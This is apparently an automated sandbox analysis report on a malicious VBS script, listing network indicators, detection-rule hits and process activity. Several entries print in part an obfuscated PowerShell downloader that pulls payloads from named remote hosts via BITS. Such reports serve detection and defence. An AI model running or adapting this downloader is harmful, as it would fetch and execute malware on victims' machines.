                      Source: Binary string: wkernel32.pdbUGP source: wab.exe, 00000008.00000003.1760053800.00000000245B0000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1760156162.00000000246D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbv source: powershell.exe, 00000006.00000002.1735332796.00000000076D4000.00000004.00000020.00020000.00000000.sdmp

                      Software Vulnerabilities

                      barindex
                      Suspicious execution chain found
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: global trafficTCP traffic: 192.168.2.7:49819 -> 91.92.252.226:7127
                      Source: Joe Sandbox ViewIP Address: 107.161.23.150 107.161.23.150
                      Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49781 -> 103.120.177.150:443
                      Source: global trafficHTTP traffic detected: GET /ms/ms.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.royalengineeringllc.comCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053C9F64 memset,memset,WSARecv,GetLastError,WSAGetLastError,WSAGetLastError,WSAGetLastError,RegisterWaitForSingleObject,10_2_053C9F64
                      Source: global trafficHTTP traffic detected: GET /ms/Nonn215.prm HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Mon, 05 Feb 2024 16:17:14 GMTUser-Agent: Microsoft BITS/7.8Host: www.astenterprises.com.pk
                      Source: global trafficHTTP traffic detected: GET /ms/ms.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.royalengineeringllc.comCache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
                      Source: global trafficDNS traffic detected: DNS query: www.royalengineeringllc.com
                      Source: powershell.exe, 00000006.00000002.1735332796.0000000007620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: svchost.exe, 00000005.00000003.1349172359.000001F91D820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: powershell.exe, 00000003.00000002.1966922652.000001EC5E145000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1733782746.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000006.00000002.1732706007.0000000004DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000003.00000002.1845588983.000001EC4E0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1732706007.0000000004C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000006.00000002.1732706007.0000000004DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000003.00000002.1845588983.000001EC4E0D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000006.00000002.1732706007.0000000004C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000006.00000002.1733782746.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000006.00000002.1733782746.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000006.00000002.1733782746.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: svchost.exe, 00000005.00000003.1349172359.000001F91D879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                      Source: svchost.exe, 00000005.00000003.1349172359.000001F91D820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                      Source: powershell.exe, 00000006.00000002.1732706007.0000000004DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000003.00000002.1845588983.000001EC4F25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000003.00000002.1966922652.000001EC5E145000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1733782746.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: svchost.exe, 00000005.00000002.2612981154.000001F91DAC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/
                      Source: svchost.exe, 00000005.00000002.2612981154.000001F91DAC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/5e
                      Source: svchost.exe, 00000005.00000002.2612981154.000001F91DAC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/C2
                      Source: svchost.exe, 00000005.00000002.2613009598.000001F91DAE4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2611854358.000001F918D02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2612780417.000001F91DA5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2612855786.000001F91DA61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/Nonn215.prm
                      Source: svchost.exe, 00000005.00000003.1432823810.000001F91D821000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2612645168.000001F91D980000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2609990879.0000009FF8A7B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/Nonn215.prm/C:
                      Source: powershell.exe, 00000003.00000002.1845588983.000001EC4E289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/Nonn215.prmP
                      Source: powershell.exe, 00000006.00000002.1732706007.0000000004DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/Nonn215.prmXR
                      Source: svchost.exe, 00000005.00000002.2612855786.000001F91DA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2612894209.000001F91DA95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk:443/ms/Nonn215.prm
                      Source: wab.exe, 00000008.00000002.1771543069.0000000007528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.royalengineeringllc.com/ms/ms.bin
                      Source: wab.exe, 00000008.00000002.1771543069.0000000007528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.royalengineeringllc.com/ms/ms.binC
                      Source: wab.exe, 00000008.00000002.1771543069.0000000007528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.royalengineeringllc.com/ms/ms.binI
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.7:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 103.120.177.150:443 -> 192.168.2.7:49781 version: TLS 1.2
                      Source: Yara matchFile source: 10.3.dialer.exe.5380000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.dialer.exe.5160000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.wab.exe.245b0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.wab.exe.247d0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.dialer.exe.5380000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000003.1764322214.0000000005380000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1764142605.0000000005160000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.1760404109.00000000245B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.1760674277.00000000247D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: amsi32_8112.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 8112, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Wscript starts Powershell (via cmd or directly)
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 Tak
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 TakJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAB779A453_2_00007FFAAB779A45
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAB7857E63_2_00007FFAAB7857E6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAB7865923_2_00007FFAAB786592
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAB7852E93_2_00007FFAAB7852E9
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053E352410_2_053E3524
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053D357310_2_053D3573
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053DBC1110_2_053DBC11
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053DC45810_2_053DC458
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053E2CBD10_2_053E2CBD
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053CD73D10_2_053CD73D
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053E272110_2_053E2721
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053E7FA210_2_053E7FA2
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053E3F8C10_2_053E3F8C
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053DC7EB10_2_053DC7EB
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053C865310_2_053C8653
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053E200910_2_053E2009
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053D38DB10_2_053D38DB
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053C834D10_2_053C834D
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053E5BA410_2_053E5BA4
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053E3BC510_2_053E3BC5
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053E22B410_2_053E22B4
                      Source: tmkSAOF3GM.vbsInitial sample: Strings found which are bigger than 50
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5757
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5757
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5757Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5757Jump to behavior
                      Source: amsi32_8112.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 8112, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@11/11@3/4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAB77AF80 CoCreateInstance,3_2_00007FFAAB77AF80
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
                      Source: C:\Windows\SysWOW64\dialer.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b25ugmmv.whp.ps1Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\tmkSAOF3GM.vbs"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7728
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8112
                      Source: C:\Windows\SysWOW64\dialer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\dialer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: tmkSAOF3GM.vbsVirustotal: Detection: 36%
                      Source: tmkSAOF3GM.vbsReversingLabs: Detection: 23%
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\tmkSAOF3GM.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub 